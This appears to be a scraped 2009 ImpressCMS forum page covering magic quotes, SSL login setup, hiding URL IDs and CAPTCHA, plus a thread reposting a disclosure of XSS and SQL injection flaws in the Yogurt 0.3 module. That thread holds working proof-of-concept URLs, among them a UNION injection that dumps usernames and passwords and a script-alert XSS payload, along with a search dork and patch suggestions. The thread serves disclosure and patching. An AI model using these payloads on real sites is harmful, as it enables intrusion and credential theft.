Magic quotes: Tool of Satan or safety net for imbys?

Just found that my server has magic quotes enabled. I've been looking at data sanitisation and validation lately, and my books pretty much say 'magic quotes are evil turn them off'.

Which is fine if the software (think modules) you are running properly escape and validate data, but as we know sometimes they don't.

So what to do - leave it on, or turn it off? What do you do?

Topic


Re: SSL login - how to set up?

  • 2009/8/1 8:45:27
  • 63RD

of course it is, but regarding the "ssl login feature" the only encryptet thig is the logincredentials.
if your serversettings say that there is only one folder(httpdocs) for secure and "insercure" connection, than you can simply change the physicalpath in your trustpath mainfile. then you can access the site via https. other option is to maybe clone your whole site and put it directly into the httpsdocs folder. then, you settings must respond to this as well, hence to search in the httpsdocs folder when entering the site via https.

there might be one thing that prevents you from running your site in ssl only. google if u use any kind of googlemaps service on your site, u mustn do that on a sll site, if you wan to, it need a mapspro account that costs approx 10k usd( ) per year.
this is a real issue when you want gmaps and for example a shop on your same site install. oledrion should have the feature to run it in ssl mode only while everything else uses just http, that would be fine but: if you have a ssl certificate, a bought one i mean, then you might be unpleased that on a mixed system(http and https at same physical location) your users get a warning that not every content is encrptet.
on the other hand, when you have a ssl site and dont mind googles rules, you may get away with a browserwarning that there is non encryptet content embedded in your ssl site because the maps api you get for free connects via non encrypted line.

its kinda dillema.

bye

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.
Topic


Re: SSL login - how to set up?

Hmm...is it possible to have my whole site in SSL? Or does this only do the login?



Re: SSL login - how to set up?

  • 2009/8/1 5:51:13
  • 63RD

yes you can
but: if your hosting setup says that there is only one folder(the httpdocs) for ssl and non ssl connections, then you should put the ssl loginfile into a exclusive folder within your documentroot, hence, a foulder without anything else in it. otherwise, you browser may come up with the panic notice that the connection is encryptet but that there are other unencryptet files.
if your ssl place is the httpsdocs documentroot and you physically reach this directory when typing https in your browser, then you can put the loginfile wherever you want.

i hope this is 100% correct. i tried it, but maybe there are possible differences i dont know about.

bye!

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


Re: SSL login - how to set up?

Thanks. Can I put the ssl directory in the web root for my site, or is it meant to sit outside the web root (like the trust path does)?



Re: SSL login - how to set up?

  • 2009/8/1 5:20:55
  • 63RD

hi!

no, there is one single file you have to put to your ssl encryptet place. example: http://www.xyz.com/ is your normal sites place. the ssl loginfile might reside in https://www.xyz.com

you find the file you need in the extras folder when you uncompress the icms install package.

hope this helps

bye!

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


SSL login - how to set up?

Just setting up a new site and thought, why not use the SSL login for a change. But I'm not clear on how it works:

Quote:

URL where SSL login page is located: https://



Do I need to build a new login page or something?



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Quote:


system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);




this whole query is not safe!! line 81 & line 83, and anywhere else in the module that is using mysql_query() & mysql_fetch_array()

because that means they accessing the DB directly & not via the core DB Layer. they should be using $icmsDB->query() or $icmsDB->fetchArray() in the mysqldatabase Class etc. for example.

sorry not been around for a while, had problems which i can't discuss, and at moment i got no internet access at home, so at mums house at mo.

Live as if you were to die tomorrow, Learn as if you were to live forever

The beauty of a living thing is not the atoms that go into it, but the way those atoms are put together!


Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

  • 2009/6/28 6:25:20
  • 63RD

Quote:

patch sql injection C:\AppServ\www\yogurt\system\writemessage.php (2 hits) Line 79:

if (isset($_GET['original'])) Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)
############### change ################ Line 81:
$rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)



hi!

i cant find this file in yogurt v3.3.3rc3. is there a chance to fix this in my version too?

The best way to predict the future is to invent it! (Alan Kay)
Good things happen when you go for it! (Alan Webb)
Seek the wisdom of the ages, but look at the world through the eyes of a child.


Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Have you tested this on the profile module included in ImpressCMS 1.2 alpha? I remember having fixed all these in it



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

Dear lostmon,

thanks for info. We will fix this.



Re: Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

patch sql injection

C:\AppServ\www\yogurt\system\writemessage.php (2 hits)
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db)

###############
change
################

Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . intval($_GET['original']), $db)

--
La curiosidad es lo que hace mover la mente...




Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

tomorrow i look to install and patch it
i donĀ“t test it in ImpressCMS but , anyway i look for patch it tommorrow.


------------------------------------------------------------------

Name : Yogurt
Site : http://sourceforge.net/projects/yogurt/
Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
Dork : "Yogurt build"

------------------------------------------------------------------


Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com

------------------------------------------------------------------


Description:

Bug : XSS

In index.php:

index.php:45: if(isset($_GET['msg']))
index.php:48: print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL

BUG : SQL INJECTION

system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
system/writemessage.php:82: or bug("Database error, please try again");
system/writemessage.php:83: $row = mysql_fetch_array($rs);



In neither case was the method _GET filtered properly.
Others .phps also contains the failures I'm posting the first one I found .. ^^

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


P0c:

XSS : http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>

First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.

SQLi :
http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--



OBS: need register_globals=on;

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-11]

--
La curiosidad es lo que hace mover la mente...


Re: Options to hide URL

I suppose adding more security checks is some of the counter measures I will take, perhaps in addition to encyrpting it.

I was afraid you'd say mod_rewrite - it's a tough piece to implement.

I had considered POST - but thought it could not be done if it were part of the dynamic row - a button on every row with a hidden variable perhaps....?

Thanks guys for the feedback!



Re: Options to hide URL

Is exposing these variables really a problem?

I mean, it doesn't matter if a user manipulates this variable as long as you verify its integrity in the server.

For example, stop processing if the variable is not a number. If it's not a number and your code has no bugs, you can bet it has been manipulated.

If you can't understand what I'm saying, you're not geek enough
ISegura.es


Re: Options to hide URL

Don't use it as a URL parameter, use it as a post parameter for a form





Options to hide URL

Whenever a dynamic grid-list is built, we always dereference the ID for that row and pass it to the next page like:

"<a href='client.php?uid=".$uid."\">client</a>"

Exposing these ids can be a security problem - what are your suggestions for hiding this information. So far I have seen:

1. Apache redirect [a little beyond me at this point....]
2. $uid = base64_encode($uid) [seems reasonable....]

Appreciate the feedback!



New alternatives in CAPTCHA?

Found two articles in Sitepoint regarding the subject. WOrth reading.

http://www.sitepoint.com/blogs/2009/05/10/googles-new-capcha-the-only-way-is-up/#comment-925430

http://www.sitepoint.com/blogs/2009/05/11/avoid-captchas/#comment-925431

If you can't understand what I'm saying, you're not geek enough
ISegura.es



 Top